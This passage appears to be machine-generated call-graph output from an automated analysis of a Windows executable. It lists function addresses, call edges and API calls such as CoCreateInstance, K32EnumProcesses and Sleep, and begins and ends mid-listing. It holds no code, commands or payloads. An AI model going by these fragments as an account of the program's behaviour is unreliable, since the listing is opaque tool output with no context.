7ff72c9b6028 43124->43130 43125->42614 43127 7ff72c9b609f 43128 7ff72c9b613a 43127->43128 43129 7ff72c9b60bb 43127->43129 43134 7ff72c9d44a0 std::_Throw_Cpp_error 50 API calls 43128->43134 43131 7ff72c9d44a0 std::_Throw_Cpp_error 50 API calls 43129->43131 43130->43127 43135 7ff72c9b6084 Sleep 43130->43135 43131->43117 43132->43118 43132->43133 43133->43113 43133->43118 43134->43117 43136 7ff72c9b39d0 2 API calls 43135->43136 43136->43130 43137->43118 43138->43133 43139->43138 43141 7ff72c9d44a0 std::_Throw_Cpp_error 50 API calls 43140->43141 43142 7ff72c9b7cba 43141->43142 44362 7ff72c9ee0b4 43142->44362 43147 7ff72c9b55a0 66 API calls 43148 7ff72c9b7d27 43147->43148 43151 7ff72c9ee0b4 __std_fs_code_page 48 API calls 43148->43151 43155 7ff72c9b7db1 _Receive_impl 43148->43155 43149 7ff72c9b846f 44401 7ff72c9b4dc0 51 API calls _com_raise_error 43149->44401 43153 7ff72c9b7d7f 43151->43153 43152 7ff72c9b8485 43156 7ff72c9fcd30 _invalid_parameter_noinfo_noreturn 47 API calls 43152->43156 43154 7ff72c9b3ab0 52 API calls 43153->43154 43157 7ff72c9b7d97 43154->43157 43155->43149 43155->43152 43158 7ff72c9b7ea1 43155->43158 43159 7ff72c9b83a5 43155->43159 43160 7ff72c9b848b 43155->43160 43168 7ff72c9b845e 43155->43168 43156->43160 43161 7ff72c9b55a0 66 API calls 43157->43161 43162 7ff72c9ee0b4 __std_fs_code_page 48 API calls 43158->43162 44398 7ff72c9d6670 10 API calls _com_raise_error 43159->44398 43164 7ff72c9fcd30 _invalid_parameter_noinfo_noreturn 47 API calls 43160->43164 43161->43155 43163 7ff72c9b7ec0 43162->43163 43166 7ff72c9b3ab0 52 API calls 43163->43166 43167 7ff72c9b8491 43164->43167 43214 7ff72c9b7ed9 _Receive_impl 43166->43214 44402 7ff72c9b4d50 51 API calls _com_raise_error 43167->44402 44400 7ff72c9b4d50 51 API calls _com_raise_error 43168->44400 43169 7ff72c9b83d2 43173 7ff72c9d1dc0 50 API calls 43169->43173 43172 7ff72c9b84a5 43174 7ff72c9fcd30 _invalid_parameter_noinfo_noreturn 47 API calls 43172->43174 43183 7ff72c9b8331 43173->43183 43175 7ff72c9b84ab 43174->43175 44403 7ff72c9b4d50 51 API calls _com_raise_error 43175->44403 43176 7ff72c9b841c _Receive_impl 43177 7ff72c9f2770 codecvt 8 API calls 43176->43177 43179 7ff72c9b8430 43177->43179 43178 7ff72c9b8451 43182 7ff72c9fcd30 _invalid_parameter_noinfo_noreturn 47 API calls 43178->43182 43179->42616 43181 7ff72c9b84bc 43186 7ff72c9fcd30 _invalid_parameter_noinfo_noreturn 47 API calls 43181->43186 43184 7ff72c9b8456 43182->43184 43183->43176 43183->43178 44399 7ff72c9b4c60 50 API calls 3 library calls 43184->44399 43187 7ff72c9b84c2 43186->43187 43190 7ff72c9fcd30 _invalid_parameter_noinfo_noreturn 47 API calls 43187->43190 43191 7ff72c9b84c8 43190->43191 43192 7ff72c9fcd30 _invalid_parameter_noinfo_noreturn 47 API calls 43191->43192 43193 7ff72c9b84ce 43192->43193 43194 7ff72c9fcd30 _invalid_parameter_noinfo_noreturn 47 API calls 43193->43194 43195 7ff72c9b84d4 CoInitialize CoCreateInstance 43194->43195 43198 7ff72c9b8548 43195->43198 43215 7ff72c9b85ab _Receive_impl 43195->43215 43197 7ff72c9b3f60 56 API calls 43197->43214 43199 7ff72c9d44a0 std::_Throw_Cpp_error 50 API calls 43198->43199 43225 7ff72c9b8569 43199->43225 43201 7ff72c9d1dc0 50 API calls 43201->43214 43202 7ff72c9b883a 43204 7ff72c9fcd30 _invalid_parameter_noinfo_noreturn 47 API calls 43202->43204 43203 7ff72c9f2770 codecvt 8 API calls 43205 7ff72c9b8823 43203->43205 43206 7ff72c9b883f 43204->43206 43205->42616 43208 7ff72c9fcd30 _invalid_parameter_noinfo_noreturn 47 API calls 43206->43208 43207 7ff72c9b8845 43209 7ff72c9fcd30 _invalid_parameter_noinfo_noreturn 47 API calls 43207->43209 43208->43207 43210 7ff72c9b884b 43209->43210 43211 7ff72c9fcd30 _invalid_parameter_noinfo_noreturn 47 API calls 43210->43211 43213 7ff72c9b8851 43211->43213 43212 7ff72c9d4160 50 API calls 43212->43214 43213->42616 43214->43167 43214->43172 43214->43175 43214->43181 43214->43183 43214->43184 43214->43187 43214->43191 43214->43193 43214->43197 43214->43201 43214->43212 44382 7ff72c9b4e20 43214->44382 44388 7ff72c9b4f80 43214->44388 44396 7ff72c9d6670 10 API calls _com_raise_error 43214->44396 44397 7ff72c9d7d80 50 API calls 4 library calls 43214->44397 43215->43207 43215->43210 43216 7ff72c9b8716 43215->43216 43217 7ff72c9b86a9 43215->43217 43221 7ff72c9b879a CoUninitialize 43216->43221 43222 7ff72c9b873a 43216->43222 43219 7ff72c9d44a0 std::_Throw_Cpp_error 50 API calls 43217->43219 43224 7ff72c9b86ce _Receive_impl 43219->43224 43220 7ff72c9b8709 CoUninitialize 43220->43225 43221->43225 43223 7ff72c9d44a0 std::_Throw_Cpp_error 50 API calls 43222->43223 43223->43224 43224->43206 43224->43220 43225->43202 43226 7ff72c9b859f _Receive_impl 43225->43226 43226->43203 43228 7ff72c9f2a38 std::_Facet_Register 50 API calls 43227->43228 43229 7ff72c9cd0fc 43228->43229 43229->42838 43231 7ff72c9be7f5 43230->43231 43232 7ff72c9c0e22 43230->43232 43234 7ff72c9d60e0 50 API calls 43231->43234 44467 7ff72c9b2410 50 API calls std::_Throw_Cpp_error 43232->44467 43236 7ff72c9be826 43234->43236 43235 7ff72c9c0e28 43238 7ff72c9fcd30 _invalid_parameter_noinfo_noreturn 47 API calls 43235->43238 43237 7ff72c9d08c0 std::_Throw_Cpp_error 50 API calls 43236->43237 43239 7ff72c9be841 _Receive_impl 43237->43239 43240 7ff72c9c0e2e 43238->43240 43239->43235 43242 7ff72c9ee0b4 __std_fs_code_page 48 API calls 43239->43242 43241 7ff72c9fcd30 _invalid_parameter_noinfo_noreturn 47 API calls 43240->43241 43243 7ff72c9c0e34 43241->43243 43244 7ff72c9be915 43242->43244 44468 7ff72c9b4dc0 51 API calls _com_raise_error 43243->44468 43245 7ff72c9b3ab0 52 API calls 43244->43245 43246 7ff72c9be93d 43245->43246 43248 7ff72c9b55a0 66 API calls 43246->43248 43253 7ff72c9be95d _Receive_impl 43248->43253 43249 7ff72c9c0e51 43250 7ff72c9fcd30 _invalid_parameter_noinfo_noreturn 47 API calls 43249->43250 43251 7ff72c9c0e57 43250->43251 44469 7ff72c9b4d50 51 API calls _com_raise_error 43251->44469 43253->43240 43253->43243 43254 7ff72c9beae9 43253->43254 43255 7ff72c9be9fd 43253->43255 43257 7ff72c9ee0b4 __std_fs_code_page 48 API calls 43254->43257 43258 7ff72c9d44a0 std::_Throw_Cpp_error 50 API calls 43255->43258 43256 7ff72c9c0e6e 43261 7ff72c9fcd30 _invalid_parameter_noinfo_noreturn 47 API calls 43256->43261 43259 7ff72c9beb20 43257->43259 43275 7ff72c9bea32 _Receive_impl 43258->43275 43260 7ff72c9b3ab0 52 API calls 43259->43260 43346 7ff72c9beb48 __std_exception_copy __scrt_get_show_window_mode _Receive_impl 43260->43346 43263 7ff72c9c0e74 43261->43263 43262 7ff72c9beab4 _Receive_impl 43264 7ff72c9f2770 codecvt 8 API calls 43262->43264 44470 7ff72c9b4d50 51 API calls _com_raise_error 43263->44470 43267 7ff72c9beacc 43264->43267 43265 7ff72c9c0e1d 43268 7ff72c9fcd30 _invalid_parameter_noinfo_noreturn 47 API calls 43265->43268 43267->42838 43268->43232 43269 7ff72c9c0e84 44471 7ff72c9b2410 50 API calls std::_Throw_Cpp_error 43269->44471 43271 7ff72c9c0e8a 44472 7ff72c9b2410 50 API calls std::_Throw_Cpp_error 43271->44472 43273 7ff72c9c0e90 44473 7ff72c9b2410 50 API calls std::_Throw_Cpp_error 43273->44473 43275->43249 43275->43262 43275->43265 43276 7ff72c9c0e96 44474 7ff72c9b4d50 51 API calls _com_raise_error 43276->44474 43277 7ff72c9c0d51 43277->43275 43359 7ff72c9d87b0 48 API calls 43277->43359 43278 7ff72c9b3f60 56 API calls 43278->43346 43280 7ff72c9b4f80 52 API calls 43280->43346 43281 7ff72c9c0ead 44475 7ff72c9b4dc0 51 API calls _com_raise_error 43281->44475 43282 7ff72c9c0fe7 44482 7ff72c9b4c60 50 API calls 3 library calls 43282->44482 43284 7ff72c9d60e0 50 API calls 43284->43346 43286 7ff72c9c0fef 43287 7ff72c9c0eca 43288 7ff72c9fcd30 _invalid_parameter_noinfo_noreturn 47 API calls 43287->43288 43289 7ff72c9c0ecf 43288->43289 43290 7ff72c9fcd30 _invalid_parameter_noinfo_noreturn 47 API calls 43289->43290 43291 7ff72c9c0ed5 43290->43291 43293 7ff72c9fcd30 _invalid_parameter_noinfo_noreturn 47 API calls 43291->43293 43292 7ff72c9f2a38 50 API calls std::_Facet_Register 43292->43346 43295 7ff72c9c0edb 43293->43295 43294 7ff72c9d06d0 50 API calls 43294->43346 44476 7ff72c9f49c0 RtlPcToFileHeader RaiseException 43295->44476 43297 7ff72c9b3ab0 52 API calls 43297->43346 43298 7ff72c9c0f36 43299 7ff72c9fcd30 _invalid_parameter_noinfo_noreturn 47 API calls 43298->43299 43300 7ff72c9c0f3c 43299->43300 43301 7ff72c9fcd30 _invalid_parameter_noinfo_noreturn 47 API calls 43300->43301 43302 7ff72c9c0f42 43301->43302 43303 7ff72c9fcd30 _invalid_parameter_noinfo_noreturn 47 API calls 43302->43303 43304 7ff72c9c0f48 43303->43304 43307 7ff72c9fcd30 _invalid_parameter_noinfo_noreturn 47 API calls 43304->43307 43305 7ff72c9ee440 66 API calls 43305->43346 43306 7ff72c9cf4e0 std::_Throw_Cpp_error 50 API calls 43306->43346 43308 7ff72c9c0f4e 43307->43308 44477 7ff72c9b4dc0 51 API calls _com_raise_error 43308->44477 43310 7ff72c9cfa80 116 API calls 43310->43346 43311 7ff72c9c0f6b 43312 7ff72c9fcd30 _invalid_parameter_noinfo_noreturn 47 API calls 43311->43312 43313 7ff72c9c0f71 43312->43313 44478 7ff72c9b4dc0 51 API calls _com_raise_error 43313->44478 43315 7ff72c9c0f8e 44479 7ff72c9b4d50 51 API calls _com_raise_error 43315->44479 43316 7ff72c9ee0b4 48 API calls __std_fs_code_page 43316->43346 43319 7ff72c9c0fa5 43322 7ff72c9fcd30 _invalid_parameter_noinfo_noreturn 47 API calls 43319->43322 43320 7ff72c9b55a0 66 API calls 43320->43346 43321 7ff72c9cf4a0 50 API calls 43321->43346 43323 7ff72c9c0fab 43322->43323 44480 7ff72c9b4d50 51 API calls _com_raise_error 43323->44480 43324 7ff72c9e2ae0 70 API calls 43324->43346 43325 7ff72c9b5d00 47 API calls 43325->43346 43327 7ff72c9c0fbb 43329 7ff72c9fcd30 _invalid_parameter_noinfo_noreturn 47 API calls 43327->43329 43328 7ff72c9c0ff0 47 API calls 43328->43346 43333 7ff72c9c0fc1 43329->43333 43331 7ff72c9e9690 58 API calls 43331->43346 43334 7ff72c9fcd30 _invalid_parameter_noinfo_noreturn 47 API calls 43333->43334 43335 7ff72c9c0fc7 43334->43335 44481 7ff72c9b4c60 50 API calls 3 library calls 43335->44481 43336 7ff72c9c0fcf 43338 7ff72c9fcd30 _invalid_parameter_noinfo_noreturn 47 API calls 43336->43338 43337 7ff72c9c0fd5 43341 7ff72c9fcd30 _invalid_parameter_noinfo_noreturn 47 API calls 43337->43341 43338->43337 43339 7ff72c9c0fdb 43343 7ff72c9fcd30 _invalid_parameter_noinfo_noreturn 47 API calls 43339->43343 43341->43339 43342 7ff72c9c0fe1 43344 7ff72c9fcd30 _invalid_parameter_noinfo_noreturn 47 API calls 43342->43344 43343->43342 43344->43282 43345 7ff72c9e7c70 58 API calls 43345->43346 43346->43251 43346->43256 43346->43263 43346->43269 43346->43271 43346->43273 43346->43276 43346->43277 43346->43278 43346->43280 43346->43281 43346->43282 43346->43284 43346->43287 43346->43289 43346->43291 43346->43292 43346->43294 43346->43295 43346->43297 43346->43298 43346->43300 43346->43302 43346->43304 43346->43305 43346->43306 43346->43308 43346->43310 43346->43311 43346->43313 43346->43315 43346->43316 43346->43319 43346->43320 43346->43321 43346->43323 43346->43324 43346->43325 43346->43327 43346->43328 43346->43331 43346->43333 43346->43335 43346->43336 43346->43337 43346->43339 43346->43342 43346->43345 43348 7ff72c9d4160 50 API calls 43346->43348 43350 7ff72c9e8e50 50 API calls 43346->43350 43351 7ff72c9e7af0 50 API calls 43346->43351 43353 7ff72c9e92e0 58 API calls 43346->43353 43355 7ff72c9d0370 47 API calls 43346->43355 43356 7ff72c9e7420 56 API calls 43346->43356 43357 7ff72c9ce550 81 API calls 43346->43357 43358 7ff72c9d2ee0 50 API calls 43346->43358 44421 7ff72c9cffc0 43346->44421 44427 7ff72c9d87b0 43346->44427 44433 7ff72c9d7870 43346->44433 44462 7ff72c9cf300 47 API calls 2 library calls 43346->44462 44463 7ff72c9e8500 58 API calls codecvt 43346->44463 44464 7ff72c9e96c0 58 API calls 4 library calls 43346->44464 44465 7ff72c9d7d80 50 API calls 4 library calls 43346->44465 44466 7ff72c9d8a60 50 API calls std::_Throw_Cpp_error 43346->44466 43348->43346 43350->43346 43351->43346 43353->43346 43355->43346 43356->43346 43357->43346 43358->43346 43359->43275 43362 7ff72c9d0922 43361->43362 43364 7ff72c9d08e3 ctype 43361->43364 44524 7ff72c9d4fa0 50 API calls 6 library calls 43362->44524 43364->42838 43365 7ff72c9d0938 43365->42838 43367 7ff72c9f2a38 std::_Facet_Register 50 API calls 43366->43367 43368 7ff72c9cec3d 43367->43368 44525 7ff72c9d8af0 43368->44525 43370 7ff72c9cec63 43370->42838 43370->43370 43372 7ff72c9f2a38 std::_Facet_Register 50 API calls 43371->43372 43373 7ff72c9c1158 43372->43373 43374 7ff72c9d44a0 std::_Throw_Cpp_error 50 API calls 43373->43374 43375 7ff72c9c1199 43374->43375 43376 7ff72c9ee0b4 __std_fs_code_page 48 API calls 43375->43376 43377 7ff72c9c11b9 43376->43377 43378 7ff72c9b3ab0 52 API calls 43377->43378 43379 7ff72c9c11d7 43378->43379 43380 7ff72c9b55a0 66 API calls 43379->43380 43382 7ff72c9c11ef _Receive_impl 43380->43382 43381 7ff72c9c20bf 44614 7ff72c9b4dc0 51 API calls _com_raise_error 43381->44614 43384 7ff72c9c20d7 43382->43384 43385 7ff72c9ee0b4 __std_fs_code_page 48 API calls 43382->43385 43415 7ff72c9c12d1 _Receive_impl 43382->43415 43444 7ff72c9c13c1 ctype _Receive_impl 43382->43444 43387 7ff72c9fcd30 _invalid_parameter_noinfo_noreturn 47 API calls 43384->43387 43386 7ff72c9c1293 43385->43386 43391 7ff72c9b3ab0 52 API calls 43386->43391 43392 7ff72c9c20dd 43387->43392 43388 7ff72c9c218e 44622 7ff72c9b4dc0 51 API calls _com_raise_error 43388->44622 43395 7ff72c9c12b1 43391->43395 44615 7ff72c9b4dc0 51 API calls _com_raise_error 43392->44615 43393 7ff72c9c139d 44553 7ff72c9d05d0 43393->44553 43394 7ff72c9c21a7 44623 7ff72c9b2410 50 API calls std::_Throw_Cpp_error 43394->44623 44537 7ff72c9b5680 43395->44537 43399 7ff72c9c2188 44621 7ff72c9b2410 50 API calls std::_Throw_Cpp_error 43399->44621 43400 7ff72c9c20f2 43407 7ff72c9fcd30 _invalid_parameter_noinfo_noreturn 47 API calls 43400->43407 43403 7ff72c9fcd30 _invalid_parameter_noinfo_noreturn 47 API calls 43406 7ff72c9c212e 43403->43406 43404 7ff72c9c217c 43409 7ff72c9fcd30 _invalid_parameter_noinfo_noreturn 47 API calls 43404->43409 43405 7ff72c9c21ad 44624 7ff72c9b2410 50 API calls std::_Throw_Cpp_error 43405->44624 44616 7ff72c9b2370 50 API calls 3 library calls 43406->44616 43412 7ff72c9c20f8 43407->43412 43408 7ff72c9c2182 43411 7ff72c9fcd30 _invalid_parameter_noinfo_noreturn 47 API calls 43408->43411 43409->43408 43411->43399 43419 7ff72c9fcd30 _invalid_parameter_noinfo_noreturn 47 API calls 43412->43419 43413 7ff72c9c203b 43421 7ff72c9c206d _Receive_impl 43413->43421 43428 7ff72c9c20ba 43413->43428 43415->43392 43415->43400 44552 7ff72c9d6540 50 API calls 5 library calls 43415->44552 43416 7ff72c9b6190 121 API calls 43416->43444 43417 7ff72c9c20fe 43423 7ff72c9fcd30 _invalid_parameter_noinfo_noreturn 47 API calls 43417->43423 43418 7ff72c9c2134 43426 7ff72c9fcd30 _invalid_parameter_noinfo_noreturn 47 API calls 43418->43426 43419->43417 43420 7ff72c9f2a38 50 API calls std::_Facet_Register 43420->43444 43425 7ff72c9d3ad0 47 API calls 43421->43425 43427 7ff72c9c2104 43423->43427 43424 7ff72c9c2176 43431 7ff72c9fcd30 _invalid_parameter_noinfo_noreturn 47 API calls 43424->43431 43429 7ff72c9c208d 43425->43429 43433 7ff72c9c213a 43426->43433 43438 7ff72c9fcd30 _invalid_parameter_noinfo_noreturn 47 API calls 43427->43438 43436 7ff72c9fcd30 _invalid_parameter_noinfo_noreturn 47 API calls 43428->43436 43435 7ff72c9f2770 codecvt 8 API calls 43429->43435 43430 7ff72c9d44a0 std::_Throw_Cpp_error 50 API calls 43430->43444 43431->43404 43432 7ff72c9d60e0 50 API calls 43432->43444 43440 7ff72c9fcd30 _invalid_parameter_noinfo_noreturn 47 API calls 43433->43440 43439 7ff72c9c209f 43435->43439 43436->43381 43442 7ff72c9c210a 43438->43442 43439->42838 43445 7ff72c9c2140 43440->43445 43441 7ff72c9d05d0 50 API calls 43441->43444 43446 7ff72c9fcd30 _invalid_parameter_noinfo_noreturn 47 API calls 43442->43446 43443 7ff72c9d08c0 50 API calls std::_Throw_Cpp_error 43443->43444 43444->43381 43444->43388 43444->43394 43444->43399 43444->43404 43444->43405 43444->43406 43444->43408 43444->43412 43444->43413 43444->43416 43444->43417 43444->43418 43444->43420 43444->43424 43444->43427 43444->43430 43444->43432 43444->43433 43444->43441 43444->43442 43444->43443 43444->43445 43448 7ff72c9c2110 43444->43448 43449 7ff72c9b6970 174 API calls 43444->43449 43450 7ff72c9c2146 43444->43450 43453 7ff72c9c2116 43444->43453 43454 7ff72c9d3880 50 API calls 43444->43454 43455 7ff72c9c214c 43444->43455 43458 7ff72c9c216a 43444->43458 43459 7ff72c9c211c 43444->43459 43461 7ff72c9c2164 43444->43461 43464 7ff72c9c2170 43444->43464 43466 7ff72c9c2122 43444->43466 43469 7ff72c9c2128 43444->43469 43470 7ff72c9ee0b4 48 API calls __std_fs_code_page 43444->43470 43471 7ff72c9b3ab0 52 API calls 43444->43471 43473 7ff72c9b55a0 66 API calls 43444->43473 44561 7ff72c9d6540 50 API calls 5 library calls 43444->44561 44562 7ff72c9d06d0 43444->44562 44579 7ff72c9b8880 118 API calls 5 library calls 43444->44579 44580 7ff72c9ee7c8 43444->44580 44617 7ff72c9b2370 50 API calls 3 library calls 43445->44617 43446->43448 43451 7ff72c9fcd30 _invalid_parameter_noinfo_noreturn 47 API calls 43448->43451 43449->43444 43452 7ff72c9fcd30 _invalid_parameter_noinfo_noreturn 47 API calls 43450->43452 43451->43453 43452->43455 43456 7ff72c9fcd30 _invalid_parameter_noinfo_noreturn 47 API calls 43453->43456 43454->43444 44618 7ff72c9b4d50 51 API calls _com_raise_error 43455->44618 43456->43459 43462 7ff72c9fcd30 _invalid_parameter_noinfo_noreturn 47 API calls 43458->43462 43465 7ff72c9fcd30 _invalid_parameter_noinfo_noreturn 47 API calls 43459->43465 44619 7ff72c9b2410 50 API calls std::_Throw_Cpp_error 43461->44619 43462->43464 44620 7ff72c9b2410 50 API calls std::_Throw_Cpp_error 43464->44620 43465->43466 43468 7ff72c9fcd30 _invalid_parameter_noinfo_noreturn 47 API calls 43466->43468 43468->43469 43469->43403 43470->43444 43471->43444 43473->43444 43475 7ff72c9d3b26 43474->43475 43476 7ff72c9d3aeb 43474->43476 44639 7ff72c9d7d20 47 API calls _Receive_impl 43476->44639 43479 7ff72c9d3060 47 API calls 43478->43479 43480 7ff72c9c1008 43479->43480 43481 7ff72c9d3060 47 API calls 43480->43481 43482 7ff72c9c1014 43481->43482 43483 7ff72c9d0370 47 API calls 43482->43483 43484 7ff72c9c101d 43483->43484 43485 7ff72c9d0370 47 API calls 43484->43485 43486 7ff72c9c1026 _Receive_impl 43485->43486 43487 7ff72c9c109f _Receive_impl 43486->43487 43488 7ff72c9fcd30 _invalid_parameter_noinfo_noreturn 47 API calls 43486->43488 43487->42838 43489 7ff72c9c10c5 43488->43489 43491 7ff72c9b61ae std::_Locinfo::_Locinfo_ctor 43490->43491 43492 7ff72c9b61f2 43491->43492 43493 7ff72c9b62f7 43491->43493 43494 7ff72c9b6756 43492->43494 43499 7ff72c9d60e0 50 API calls 43492->43499 43500 7ff72c9d06d0 50 API calls 43493->43500 43508 7ff72c9b624c _Receive_impl 43493->43508 44651 7ff72c9b2410 50 API calls std::_Throw_Cpp_error 43494->44651 43496 7ff72c9b6750 44650 7ff72c9b2410 50 API calls std::_Throw_Cpp_error 43496->44650 43498 7ff72c9b675c 43503 7ff72c9fcd30 _invalid_parameter_noinfo_noreturn 47 API calls 43498->43503 43502 7ff72c9b6234 43499->43502 43500->43508 43501 7ff72c9d60e0 50 API calls 43507 7ff72c9b6360 _Receive_impl 43501->43507 43504 7ff72c9d08c0 std::_Throw_Cpp_error 50 API calls 43502->43504 43505 7ff72c9b6762 43503->43505 43504->43508 43510 7ff72c9fcd30 _invalid_parameter_noinfo_noreturn 47 API calls 43505->43510 43506 7ff72c9b6768 43511 7ff72c9fcd30 _invalid_parameter_noinfo_noreturn 47 API calls 43506->43511 43507->43496 43507->43506 43509 7ff72c9d60e0 50 API calls 43507->43509 43508->43496 43508->43498 43508->43501 43508->43505 43512 7ff72c9b63e1 _Receive_impl 43509->43512 43510->43506 43512->43506 45036 7ff72c9ba810 43716->45036 44193->42838 44194->42838 44195->42838 44196->42838 44197->42838 44198->42838 44199->42838 44201 7ff72c9d0381 44200->44201 44203 7ff72c9d038a _Receive_impl 44200->44203 45412 7ff72c9d46a0 47 API calls 2 library calls 44201->45412 44203->42838 44210->42632 44217 7ff72c9c797c K32EnumProcesses 44216->44217 44217->42882 44217->42891 44220 7ff72c9d1de8 44218->44220 44224 7ff72c9d5b90 44220->44224 44221 7ff72c9d1e34 44222 7ff72c9d1160 10 API calls 44221->44222 44223 7ff72c9d1e3c 44222->44223 44223->42886 44225 7ff72c9d5bc1 44224->44225 44226 7ff72c9d5bd6 44225->44226 44227 7ff72c9d1160 10 API calls 44225->44227 44228 7ff72c9d5ca8 44226->44228 44231 7ff72c9d5cdd 44226->44231 44227->44226 44229 7ff72c9d5cb9 44228->44229 44240 7ff72c9d12c0 RtlPcToFileHeader RaiseException _com_raise_error 44228->44240 44229->44221 44241 7ff72c9f49c0 RtlPcToFileHeader RaiseException 44231->44241 44233 7ff72c9d5d30 44234 7ff72c9d62f3 44233->44234 44235 7ff72c9d652f 44233->44235 44242 7ff72c9d0e30 44234->44242 44255 7ff72c9eeec4 50 API calls 2 library calls 44235->44255 44239 7ff72c9d632a std::_Locinfo::_Locinfo_ctor 44239->44221 44240->44229 44241->44233 44243 7ff72c9d0e5c 44242->44243 44254 7ff72c9d0efb _Receive_impl 44242->44254 44244 7ff72c9d0f62 44243->44244 44245 7ff72c9d0e81 44243->44245 44247 7ff72c9d0e8e 44243->44247 44248 7ff72c9d0eb7 44243->44248 44256 7ff72c9b2370 50 API calls 3 library calls 44244->44256 44252 7ff72c9fcd30 _invalid_parameter_noinfo_noreturn 47 API calls 44245->44252 44245->44254 44247->44244 44249 7ff72c9d0e9b 44247->44249 44250 7ff72c9f2a38 std::_Facet_Register 50 API calls 44248->44250 44251 7ff72c9f2a38 std::_Facet_Register 50 API calls 44249->44251 44250->44245 44251->44245 44253 7ff72c9d0f6d 44252->44253 44254->44239 44256->44245 44257->42903 44258->42909 44259->42915 44260->42919 44262 7ff72c9eeae4 std::_Lockit::_Lockit 6 API calls 44261->44262 44263 7ff72c9d7310 44262->44263 44264 7ff72c9eeae4 std::_Lockit::_Lockit 6 API calls 44263->44264 44270 7ff72c9d735f 44263->44270 44266 7ff72c9d7335 44264->44266 44265 7ff72c9d73ac 44267 7ff72c9eeb5c std::_Lockit::~_Lockit LeaveCriticalSection 44265->44267 44268 7ff72c9eeb5c std::_Lockit::~_Lockit LeaveCriticalSection 44266->44268 44269 7ff72c9d73f0 44267->44269 44268->44270 44271 7ff72c9f2770 codecvt 8 API calls 44269->44271 44270->44265 44290 7ff72c9b3130 87 API calls 7 library calls 44270->44290 44272 7ff72c9d22d3 44271->44272 44280 7ff72c9d5710 44272->44280 44274 7ff72c9d73be 44275 7ff72c9d7413 44274->44275 44276 7ff72c9d73c4 44274->44276 44292 7ff72c9b2bf0 50 API calls 3 library calls 44275->44292 44291 7ff72c9ef08c 50 API calls std::_Facet_Register 44276->44291 44279 7ff72c9d7418 44281 7ff72c9d5741 44280->44281 44282 7ff72c9d1160 10 API calls 44281->44282 44283 7ff72c9d5756 44281->44283 44282->44283 44285 7ff72c9d582f 44283->44285 44287 7ff72c9d5864 44283->44287 44284 7ff72c9d2313 44284->42926 44285->44284 44293 7ff72c9d12c0 RtlPcToFileHeader RaiseException _com_raise_error 44285->44293 44294 7ff72c9f49c0 RtlPcToFileHeader RaiseException 44287->44294 44289 7ff72c9d58b7 44290->44274 44291->44265 44292->44279 44293->44284 44294->44289 44295->42934 44296->42930 44338 7ff72c9cee10 44297->44338 44300 7ff72c9cee10 50 API calls 44301 7ff72c9d29ef 44300->44301 44302 7ff72c9cee10 50 API calls 44301->44302 44303 7ff72c9d29fd 44302->44303 44304 7ff72c9cee10 50 API calls 44303->44304 44305 7ff72c9d2a0b 44304->44305 44306 7ff72c9cec10 50 API calls 44305->44306 44307 7ff72c9d2a19 44306->44307 44308 7ff72c9cee10 50 API calls 44307->44308 44309 7ff72c9d2a27 44308->44309 44310 7ff72c9cee10 50 API calls 44309->44310 44311 7ff72c9d2a47 44310->44311 44312 7ff72c9cf4e0 std::_Throw_Cpp_error 50 API calls 44311->44312 44313 7ff72c9d2a5b 44312->44313 44314 7ff72c9cee10 50 API calls 44313->44314 44315 7ff72c9d2a84 44314->44315 44316 7ff72c9cee10 50 API calls 44315->44316 44317 7ff72c9d2a95 44316->44317 44318 7ff72c9cee10 50 API calls 44317->44318 44319 7ff72c9d2aa6 44318->44319 44320 7ff72c9cee10 50 API calls 44319->44320 44321 7ff72c9d2ab7 44320->44321 44322 7ff72c9cee10 50 API calls 44321->44322 44323 7ff72c9d2acb 44322->44323 44324 7ff72c9cec10 50 API calls 44323->44324 44325 7ff72c9d2adf 44324->44325 44326 7ff72c9cf4e0 std::_Throw_Cpp_error 50 API calls 44325->44326 44327 7ff72c9d2af3 44326->44327 44328 7ff72c9cf4e0 std::_Throw_Cpp_error 50 API calls 44327->44328 44329 7ff72c9d2b20 44328->44329 44330 7ff72c9cec10 50 API calls 44329->44330 44331 7ff72c9d2b34 44330->44331 44332 7ff72c9cec10 50 API calls 44331->44332 44333 7ff72c9d2b48 44332->44333 44334 7ff72c9cf4e0 std::_Throw_Cpp_error 50 API calls 44333->44334 44335 7ff72c9d2b8f 44334->44335 44336 7ff72c9cee10 50 API calls 44335->44336 44337 7ff72c9d2994 44336->44337 44337->42946 44339 7ff72c9cee4e 44338->44339 44346 7ff72c9ceea8 44338->44346 44348 7ff72c9d5e60 50 API calls 3 library calls 44339->44348 44341 7ff72c9f2770 codecvt 8 API calls 44342 7ff72c9ceebc 44341->44342 44342->44300 44343 7ff72c9cee9d 44349 7ff72c9d46a0 47 API calls 2 library calls 44343->44349 44345 7ff72c9cf4e0 std::_Throw_Cpp_error 50 API calls 44347 7ff72c9cee53 44345->44347 44346->44341 44347->44343 44347->44345 44348->44347 44349->44346 44351->42970 44352->42991 44353->43081 44360 7ff72c9eea08 QueryPerformanceFrequency 44355->44360 44357 7ff72c9b39e2 44361 7ff72c9ee9ec QueryPerformanceCounter 44357->44361 44359 7ff72c9b39ea 44359->43124 44360->44357 44361->44359 44404 7ff72ca01824 44362->44404 44365 7ff72c9ee0c6 AreFileApisANSI 44366 7ff72c9b7cf3 44365->44366 44367 7ff72c9b3ab0 44366->44367 44368 7ff72c9b3b04 44367->44368 44369 7ff72c9b3bda 44367->44369 44381 7ff72c9b3c00 44368->44381 44414 7ff72c9ee0dc MultiByteToWideChar GetLastError 44368->44414 44369->43147 44372 7ff72c9b3b2a 44373 7ff72c9b3c06 44372->44373 44377 7ff72c9b3b45 44372->44377 44415 7ff72c9d4730 50 API calls 6 library calls 44372->44415 44419 7ff72c9b2b80 50 API calls _com_raise_error 44373->44419 44416 7ff72c9ee0dc MultiByteToWideChar GetLastError 44377->44416 44379 7ff72c9b3bcf 44379->44369 44417 7ff72c9b2b80 50 API calls _com_raise_error 44379->44417 44418 7ff72c9b2800 50 API calls 2 library calls 44381->44418 44383 7ff72c9b4ebf 44382->44383 44387 7ff72c9b4e57 44382->44387 44385 7ff72c9ee440 66 API calls 44383->44385 44384 7ff72c9f2770 codecvt 8 API calls 44386 7ff72c9b4f6d 44384->44386 44385->44387 44386->43214 44387->44384 44394 7ff72c9b4fb0 44388->44394 44389 7ff72c9ee38c 2 API calls 44389->44394 44390 7ff72c9f2770 codecvt 8 API calls 44393 7ff72c9b5046 44390->44393 44391 7ff72c9b4fe7 44420 7ff72c9b5270 50 API calls 2 library calls 44391->44420 44392 7ff72c9b4ff4 44392->44390 44393->43214 44394->44389 44394->44391 44394->44392 44396->43214 44397->43214 44398->43169 